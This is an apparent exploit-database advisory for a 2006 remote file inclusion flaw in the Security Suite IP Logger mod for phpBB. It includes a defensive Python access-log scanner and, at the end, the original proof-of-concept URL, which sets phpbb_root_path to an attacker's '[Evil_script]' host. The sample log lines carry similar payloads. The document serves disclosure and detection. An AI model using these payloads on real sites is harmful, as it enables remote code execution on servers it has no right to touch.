Vendor: Security Suite IP Logger
By: SpiderZ
CVSS: 9,3 (HIGH)
Vulnerability Type: Remote File Inclusion
CWE: 94
Product Name: Security Suite IP Logger
Affected Version From: 2.0.x
Affected Version To: 2.0.21
Patch Exists: YES
Related CVE: CVE-2006-5183
CPE: a:phpbb:security_suite_ip_logger
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
Year: 2006

Security Suite IP Logger Remote File Inclusion Vulnerability

This vulnerability allows remote attackers to execute arbitrary PHP code on vulnerable installations of phpBB. Authentication is not required to exploit it. The cause is that the "logger_engine.php" script does not properly sanitize user-supplied input to the "phpbb_root_path" parameter, which can be exploited to include arbitrary local or remote PHP files.

Mitigation:

Upgrade to the latest version of Security Suite IP Logger.
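
A log check for the request pattern described above, as an added example that is not part of the original advisory or the mod's code: it scans web server access logs for requests to includes/logger_engine.php that supply phpbb_root_path in the query string. The log lines are constructed, and the names classify and scan, along with the assumption that legitimate traffic never sets this parameter in a request, are assumptions of this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed access-log lines (combined log format), for illustration only.
SAMPLE_LOG = [
    '203.0.113.7 - - [05/Oct/2006:10:01:02 +0000] "GET /forum/includes/logger_engine.php?phpbb_root_path=http://example.invalid/x HTTP/1.1" 200 512',
    '203.0.113.7 - - [05/Oct/2006:10:01:09 +0000] "GET /forum/includes/logger_engine.php?phpbb_root_path=..%2F..%2Fplaceholder%2F HTTP/1.1" 200 97',
    '198.51.100.4 - - [05/Oct/2006:10:02:00 +0000] "GET /forum/viewtopic.php?t=42 HTTP/1.1" 200 8120',
    '192.0.2.55 - - [05/Oct/2006:10:03:00 +0000] "GET /forum/includes/logger_engine.php?a=1&phpbb_root_path=%252e%252e%252f HTTP/1.1" 200 97',
]

# Client address and request target from a combined-format log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# "scheme://..." or protocol-relative "//host/..." values point at a remote file.
REMOTE_RE = re.compile(r'^(?:[a-z][a-z0-9+.-]*:)?//', re.I)

def classify(value):
    """Label a client-supplied phpbb_root_path value (already decoded once)."""
    v = unquote(value)  # second decode catches double-encoded values
    if REMOTE_RE.match(v):
        return "remote-include"
    if ".." in v or v.startswith("/") or "\x00" in v:
        return "local-include"
    return "parameter-override"  # still unexpected: clients should never set it

def scan(lines):
    """Return (client, label) for each request that sets phpbb_root_path."""
    findings = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parsable request line
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith("/includes/logger_engine.php"):
            continue
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if name == "phpbb_root_path":
                findings.append((client, classify(value)))
    return findings

if __name__ == "__main__":
    for client, label in scan(SAMPLE_LOG):
        print(client, label)
```

Access logs record only the query string, so this check covers GET-style requests; any hit on a host running an affected version warrants review of that host.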

Exploit-DB raw data:

           /      \
        \  \  ,,  /  /
         '-.`\()/`.-'
        .--_'(  )'_--.
       / /` /`""`\ `\ \           * SpiderZ Hacking Security *
        |  |  ><  |  |
        \  \      /  /
            '.__.'


# Author: SpiderZ
# Security Suite IP Logger Remote File Inclusion Vulnerability
# For: phpBB ( 2.0.x - 2.0.21 )
# Site: www.spiderz.altervista.org
# Site02: www.spiderz.netsons.org
_________________________________________________________________________


# Remote File Inclusion - Security Suite IP Logger



http://site.com/[path]/includes/logger_engine.php?phpbb_root_path=http://[Evil_script]



-------------------------------------------------------------------------

# Download: http://www.phpbb.de/viewtopic.php?t=30261

# Download2: http://prdownload.berlios.de/dwingmods/logger_mod100.zip

-------------------------------------------------------------------------

# milw0rm.com [2006-10-05]